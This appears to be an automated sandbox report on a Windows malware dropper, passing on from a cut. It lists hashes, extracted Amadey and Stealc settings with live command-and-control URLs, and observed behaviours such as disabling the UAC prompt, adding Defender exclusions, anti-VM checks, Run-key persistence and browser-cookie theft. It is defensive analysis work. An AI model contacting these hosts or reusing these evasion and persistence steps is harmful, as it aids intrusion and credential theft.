Analysis
-
max time kernel
42s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 19:50
Static task
static1
Behavioral task
behavioral1
Sample
436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe
Resource
win10v2004-20241007-en
General
-
Target
436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe
-
Size
1.8MB
-
MD5
da4b77594a6a31a9b1fcbabb65346fa5
-
SHA1
ba835cb96f1e3d8267a973d147a1ccbf80fbd3c4
-
SHA256
436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0
-
SHA512
c9b18ab6193c0e3d84ca93ea23338447e665785f4e6c9fc6b65cc6c9aa924118fcb0d3a26a61e43432ef25c5dc412912f7cd23068cdc22528c565f75061cb687
-
SSDEEP
49152:j++S/0Cfy6rIyGFA0F8yU/qfb7u5CpRvSM/TG5:y+89yxyGrdVfcCpRlK5
Malware Config
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/FF/3.png
Extracted
http://176.113.115.178/Windows-Update
Extracted
http://176.113.115.178/FF/1.png
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
mars
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Stealc family
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
Processes:
ba6bdb3357.exebb5b798a24.exe41aed9b042.exec8807293c3.exe436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exeskotes.exeL.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ba6bdb3357.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bb5b798a24.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 41aed9b042.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c8807293c3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ L.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exemshta.exepowershell.exeflow pid process 52 1384 powershell.exe 53 896 powershell.exe 54 1196 mshta.exe 55 5424 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 828 powershell.exe 7020 powershell.exe 5252 powershell.exe 4400 powershell.exe 4796 powershell.exe 4224 powershell.exe 1384 powershell.exe 896 powershell.exe 5424 powershell.exe 4796 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
Processes:
chrome.exechrome.exechrome.exechrome.exepid process 5736 chrome.exe 5256 chrome.exe 6108 chrome.exe 4712 chrome.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
LB31.exe436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe41aed9b042.exebb5b798a24.exeL.exeba6bdb3357.exec8807293c3.exeskotes.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 41aed9b042.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 41aed9b042.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bb5b798a24.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ba6bdb3357.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ba6bdb3357.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c8807293c3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bb5b798a24.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c8807293c3.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
skotes.exewscript.exeWScript.exemshta.exe436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe -
Executes dropped EXE 13 IoCs
Processes:
skotes.exeL.exeba6bdb3357.exefile.exeFunnyJellyfish.exeFunnyJellyfish.tmpbb5b798a24.exe41aed9b042.exeFunnyJellyfish.exeFunnyJellyfish.tmp788f72d2ea.exeLB31.exec8807293c3.exepid process 2360 skotes.exe 1988 L.exe 2260 ba6bdb3357.exe 1352 file.exe 2424 FunnyJellyfish.exe 5656 FunnyJellyfish.tmp 5840 bb5b798a24.exe 5272 41aed9b042.exe 4344 FunnyJellyfish.exe 6952 FunnyJellyfish.tmp 6212 788f72d2ea.exe 6652 LB31.exe 5792 c8807293c3.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
ba6bdb3357.exebb5b798a24.exe41aed9b042.exec8807293c3.exe436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exeskotes.exeL.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine ba6bdb3357.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine bb5b798a24.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 41aed9b042.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine c8807293c3.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine L.exe -
Loads dropped DLL 2 IoCs
Processes:
regsvr32.exeregsvr32.exepid process 2420 regsvr32.exe 4948 regsvr32.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
Processes:
RegSvcs.exedescription ioc process Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
skotes.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bb5b798a24.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008011001\\bb5b798a24.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\41aed9b042.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008012001\\41aed9b042.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\788f72d2ea.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008013001\\788f72d2ea.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 5956 powercfg.exe 6048 powercfg.exe 1824 powercfg.exe 6748 powercfg.exe 4896 powercfg.exe 3216 powercfg.exe 2520 powercfg.exe 5828 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1008013001\788f72d2ea.exe autoit_exe -
Drops file in System32 directory 1 IoCs
Processes:
LB31.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe LB31.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exeskotes.exeL.exeba6bdb3357.exebb5b798a24.exe41aed9b042.exec8807293c3.exepid process 3476 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe 2360 skotes.exe 1988 L.exe 2260 ba6bdb3357.exe 5840 bb5b798a24.exe 5272 41aed9b042.exe 5792 c8807293c3.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 896 set thread context of 2108 896 powershell.exe RegSvcs.exe -
Drops file in Windows directory 1 IoCs
Processes:
436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exedescription ioc process File created C:\Windows\Tasks\skotes.job 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 6832 sc.exe 6140 sc.exe 1736 sc.exe 1564 sc.exe 6504 sc.exe 6528 sc.exe 1608 sc.exe 5780 sc.exe 3508 sc.exe 2072 sc.exe 4304 sc.exe 5796 sc.exe 6732 sc.exe 5824 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1768 2260 WerFault.exe ba6bdb3357.exe -
System Location Discovery: System Language Discovery 1 TTPs 21 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
taskkill.execmd.exe41aed9b042.exe788f72d2ea.exetaskkill.exec8807293c3.exe436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exeRegSvcs.exetimeout.exeFunnyJellyfish.tmpba6bdb3357.exeregsvr32.exetaskkill.exebb5b798a24.exeFunnyJellyfish.exetaskkill.exetaskkill.exeskotes.exeL.exeFunnyJellyfish.exeFunnyJellyfish.tmpdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 41aed9b042.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 788f72d2ea.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c8807293c3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ba6bdb3357.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bb5b798a24.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language L.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5200 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 1608 ipconfig.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4572 taskkill.exe 4080 taskkill.exe 5676 taskkill.exe 2412 taskkill.exe 4712 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 44 IoCs
Processes:
436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exeskotes.exeL.exeba6bdb3357.exepowershell.exepowershell.exepowershell.exepowershell.exebb5b798a24.exe41aed9b042.exeFunnyJellyfish.tmppowershell.exepowershell.exe788f72d2ea.exeLB31.exepowershell.exec8807293c3.exepid process 3476 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe 3476 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe 2360 skotes.exe 2360 skotes.exe 1988 L.exe 1988 L.exe 2260 ba6bdb3357.exe 2260 ba6bdb3357.exe 896 powershell.exe 1384 powershell.exe 1384 powershell.exe 896 powershell.exe 5424 powershell.exe 5424 powershell.exe 5424 powershell.exe 828 powershell.exe 828 powershell.exe 828 powershell.exe 5840 bb5b798a24.exe 5840 bb5b798a24.exe 5272 41aed9b042.exe 5272 41aed9b042.exe 5272 41aed9b042.exe 6952 FunnyJellyfish.tmp 6952 FunnyJellyfish.tmp 4400 powershell.exe 4400 powershell.exe 4400 powershell.exe 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe 6212 788f72d2ea.exe 6212 788f72d2ea.exe 6652 LB31.exe 7020 powershell.exe 7020 powershell.exe 7020 powershell.exe 5792 c8807293c3.exe 5792 c8807293c3.exe 6652 LB31.exe 6652 LB31.exe 6652 LB31.exe 6652 LB31.exe 6652 LB31.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exeRegSvcs.exepowershell.exepowershell.exetaskkill.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 896 powershell.exe Token: SeDebugPrivilege 1384 powershell.exe Token: SeDebugPrivilege 2108 RegSvcs.exe Token: SeDebugPrivilege 5424 powershell.exe Token: SeDebugPrivilege 828 powershell.exe Token: SeDebugPrivilege 5676 taskkill.exe Token: SeDebugPrivilege 4400 powershell.exe Token: SeIncreaseQuotaPrivilege 4400 powershell.exe Token: SeSecurityPrivilege 4400 powershell.exe Token: SeTakeOwnershipPrivilege 4400 powershell.exe Token: SeLoadDriverPrivilege 4400 powershell.exe Token: SeSystemProfilePrivilege 4400 powershell.exe Token: SeSystemtimePrivilege 4400 powershell.exe Token: SeProfSingleProcessPrivilege 4400 powershell.exe Token: SeIncBasePriorityPrivilege 4400 powershell.exe Token: SeCreatePagefilePrivilege 4400 powershell.exe Token: SeBackupPrivilege 4400 powershell.exe Token: SeRestorePrivilege 4400 powershell.exe Token: SeShutdownPrivilege 4400 powershell.exe Token: SeDebugPrivilege 4400 powershell.exe Token: SeSystemEnvironmentPrivilege 4400 powershell.exe Token: SeRemoteShutdownPrivilege 4400 powershell.exe Token: SeUndockPrivilege 4400 powershell.exe Token: SeManageVolumePrivilege 4400 powershell.exe Token: 33 4400 powershell.exe Token: 34 4400 powershell.exe Token: 35 4400 powershell.exe Token: 36 4400 powershell.exe Token: SeDebugPrivilege 4796 powershell.exe Token: SeIncreaseQuotaPrivilege 4796 powershell.exe Token: SeSecurityPrivilege 4796 powershell.exe Token: SeTakeOwnershipPrivilege 4796 powershell.exe Token: SeLoadDriverPrivilege 4796 powershell.exe Token: SeSystemProfilePrivilege 4796 powershell.exe Token: SeSystemtimePrivilege 4796 powershell.exe Token: SeProfSingleProcessPrivilege 4796 powershell.exe Token: SeIncBasePriorityPrivilege 4796 powershell.exe Token: SeCreatePagefilePrivilege 4796 powershell.exe Token: SeBackupPrivilege 4796 powershell.exe Token: SeRestorePrivilege 4796 powershell.exe Token: SeShutdownPrivilege 4796 powershell.exe Token: SeDebugPrivilege 4796 powershell.exe Token: SeSystemEnvironmentPrivilege 4796 powershell.exe Token: SeRemoteShutdownPrivilege 4796 powershell.exe Token: SeUndockPrivilege 4796 powershell.exe Token: SeManageVolumePrivilege 4796 powershell.exe Token: 33 4796 powershell.exe Token: 34 4796 powershell.exe Token: 35 4796 powershell.exe Token: 36 4796 powershell.exe Token: SeIncreaseQuotaPrivilege 4796 powershell.exe Token: SeSecurityPrivilege 4796 powershell.exe Token: SeTakeOwnershipPrivilege 4796 powershell.exe Token: SeLoadDriverPrivilege 4796 powershell.exe Token: SeSystemProfilePrivilege 4796 powershell.exe Token: SeSystemtimePrivilege 4796 powershell.exe Token: SeProfSingleProcessPrivilege 4796 powershell.exe Token: SeIncBasePriorityPrivilege 4796 powershell.exe Token: SeCreatePagefilePrivilege 4796 powershell.exe Token: SeBackupPrivilege 4796 powershell.exe Token: SeRestorePrivilege 4796 powershell.exe Token: SeShutdownPrivilege 4796 powershell.exe Token: SeDebugPrivilege 4796 powershell.exe Token: SeSystemEnvironmentPrivilege 4796 powershell.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
Processes:
